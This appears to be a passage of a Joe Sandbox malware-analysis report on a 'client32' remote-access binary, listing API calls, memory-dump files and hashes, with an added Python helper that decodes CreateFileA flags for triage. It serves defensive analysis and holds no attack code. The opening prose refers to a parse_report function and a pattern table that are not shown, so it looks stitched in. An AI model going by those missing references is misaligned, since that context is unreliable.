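```

Running `parse_report` over the full text of the report instead of SAMPLE gives one entry per function; the subcall lines are kept but excluded from `apis()` so that a helper's CreateFileA does not make every caller look like it opens files itself. The pattern table is deliberately narrow: it encodes only what these three entries show, and anything broader (for example treating every LoadLibraryA/GetProcAddress pair as suspicious) would fire on most legitimate Windows software.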
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
• GetSubMenu.USER32(00000000,00000000), ref: 110033EA
• GetSubMenu.USER32(00000000,00000000), ref: 1100340C
• DestroyMenu.USER32(00000000), ref: 1100341A
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
• GetSubMenu.USER32(00000000,00000000), ref: 110032F3
• GetMenuItemCount.USER32(00000000), ref: 11003317
• DestroyMenu.USER32(00000000), ref: 11003329
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 4241058051-934300333
• Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
• Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
• Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
• Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6
APIs
• CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
• Instruction ID: 402bb12deb77936e5eeacb062a8de3ed675085140f67c3334ce786458653fa44
• Opcode Fuzzy Hash: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
• Instruction Fuzzy Hash: 3141A772E012199FD710CFA9D885BAEF7F8EF84719F10856AE916DB240DB35E500CB91
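The CreateFileA entry above is shown only as raw hex arguments, which is how Joe Sandbox prints every call in these per-function listings. The following Python helper is an added example, not part of the Joe Sandbox report or of the sample's code: it parses a CreateFileA/W line in this listing format and decodes the numeric parameters into their documented Win32 constant names. For the line above it yields GENERIC_WRITE, no sharing, CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, i.e. this function creates or truncates a file for writing. It assumes the sandbox prints arguments in prototype order (as the line above shows) and marks unresolved values with `?`; the sample line is copied from the block above.

```python
"""Decode the raw CreateFileA/W argument values that Joe Sandbox prints in its
per-function API listings into their Win32 constant names.

Added example; not part of the Joe Sandbox report or of the analysed sample.
Assumption: arguments are printed in prototype order and '?' marks a value the
sandbox could not resolve.
"""
import re

# Documented Win32 values (winnt.h / fileapi.h).
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FLAGS_AND_ATTRS = {
    0x00000001: "FILE_ATTRIBUTE_READONLY",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM",
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}

# Copied from the CreateFileA entry in the report block above.
SAMPLE_LINE = ("CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,"
               "08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563")

_TRACE_RE = re.compile(r"CreateFile[AW]\.KERNEL32\(([^)]*)\)")


def decode_flags(value, table):
    """Split a bitmask into the names of the bits it contains; any bit the table
    does not know is reported as hex so nothing is silently dropped."""
    names, leftover = [], value
    for bit, name in table.items():
        if value & bit:
            names.append(name)
            leftover &= ~bit
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def decode_createfile_trace(line):
    """Parse one Joe Sandbox CreateFileA/W line and decode its numeric arguments."""
    m = _TRACE_RE.search(line)
    if not m:
        raise ValueError("not a CreateFileA/W trace line")
    args = [a.strip() for a in m.group(1).split(",")]
    if len(args) < 7:
        raise ValueError("CreateFile takes 7 parameters; trace line is truncated")

    # The sandbox dumps more stack slots than the 7 parameters; slots past
    # hTemplateFile are ignored. '?' means the value could not be resolved.
    def slot(i):
        return None if args[i] == "?" else int(args[i], 16)

    access, share, disp, flags = slot(1), slot(2), slot(4), slot(5)
    result = {
        "access": decode_flags(access, GENERIC_ACCESS) if access is not None else ["?"],
        "share": decode_flags(share, SHARE_MODE) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disp, f"unknown({disp})") if disp is not None else "?",
        "flags": decode_flags(flags, FLAGS_AND_ATTRS) if flags is not None else ["?"],
    }
    # Triage hint: write access combined with a creating/truncating disposition
    # is the pattern to look at first when locating where a dropper writes files.
    result["creates_or_overwrites"] = (
        "GENERIC_WRITE" in result["access"] or "GENERIC_ALL" in result["access"]
    ) and result["disposition"] in ("CREATE_NEW", "CREATE_ALWAYS", "TRUNCATE_EXISTING")
    return result


if __name__ == "__main__":
    for key, val in decode_createfile_trace(SAMPLE_LINE).items():
        print(f"{key:22} {val}")
```

Note that lpFileName (the first argument) is printed as 00000000 in this trace, so the listing alone does not tell you which file this function writes; correlate the ref address 110ED563 with the report's dropped-files section or set a breakpoint there in a debugger. An empty share list means the file is opened exclusively.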
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 687F5FBC
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C74B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C756
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C765
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C770
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C77F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C78A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 380063240-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbsrchr.MSVCR100(688883F4,0000002E,688883F4,00000012), ref: 68836957
                                                                                                                                                                                                      • Part of subcall function 688415E3: __mbsrchr_l.LIBCMT(00000400,6882F396,00000000,?,6882EF5D,6882F396,0000002E,?,?,?,6882F396,00000400,?), ref: 688415F0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(688883F4,00000012), ref: 6883696E
                                                                                                                                                                                                    • strtoul.MSVCR100(00000001,00000000,00000020,00000000,688883F4,00000012), ref: 6883697F
                                                                                                                                                                                                    • __ultoa_s.LIBCMT(?,?,00000008,00000020,00000000,688883F4,00000012), ref: 688369A8
                                                                                                                                                                                                    • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,688883F4,00000012), ref: 688369BF
                                                                                                                                                                                                    • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,688883F4,00000012), ref: 688369D0
                                                                                                                                                                                                    • _errno.MSVCR100(68836B18,00000010,68836B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 688369E7
                                                                                                                                                                                                    • _errno.MSVCR100(68836B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,688883F4,00000012), ref: 68836A02
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__invoke_watson__mbsrchr_l__ultoa_s_invalid_parameter_noinfo_mbsrchrstrcpy_sstrtoul
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319564628-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA51
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA5E
                                                                                                                                                                                                    • _msize.MSVCR100(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA7B
                                                                                                                                                                                                      • Part of subcall function 687E25DA: HeapSize.KERNEL32(00000000,00000000,?,687EAA80,00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?), ref: 687E25F4
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA97
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA9F
                                                                                                                                                                                                    • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F283A
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F2850
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1113F2CB
                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 1113F2E8
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1113F309
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F312
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F33A
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$Item$Delete$Count
• String ID:
• API String ID: 1985338998-0
APIs
• _errno.MSVCR100(?,?,688568DE,?,?), ref: 68856A33
• _invalid_parameter_noinfo.MSVCR100(?,?,688568DE,?,?), ref: 68856A3E
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
• _errno.MSVCR100(?,?,?,688568DE,?,?), ref: 68856A50
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
Similarity
• API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
• String ID:
• API String ID: 4106058386-0
APIs
• _errno.MSVCR100(00000000,00000000,687E6D5D,?,000000BC,?,00000000,00000000,00000005), ref: 687F5C28
• _invalid_parameter_noinfo.MSVCR100(00000000,00000000,687E6D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6880A1A9
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
Similarity
• API ID: _errno_invalid_parameter_noinfo
• String ID: $$]m~h
• API String ID: 2959964966-2449694041
APIs
• _free.LIBCMT ref: 110430DC
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• _free.LIBCMT ref: 110430FC
• _strncpy.LIBCMT ref: 1104312A
• _strncpy.LIBCMT ref: 11043167
• _strncpy.LIBCMT ref: 110431B2
• _strncpy.LIBCMT ref: 110431F2
• _strncpy.LIBCMT ref: 1104323B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: _strncpy$_free$ErrorFreeHeapLast
• String ID:
• API String ID: 1231584600-0
APIs
• _memset.LIBCMT ref: 1101F1B1
  • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
• SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
• GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
• _fputs.LIBCMT ref: 1101F313
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                                                                                    • String ID: ChatPath$X
                                                                                                                                                                                                    • API String ID: 2661292734-3955712077
                                                                                                                                                                                                    • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CF020: wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009686
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100969B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 1100963D, 11009665
                                                                                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009695
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009638, 11009660
                                                                                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009609
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
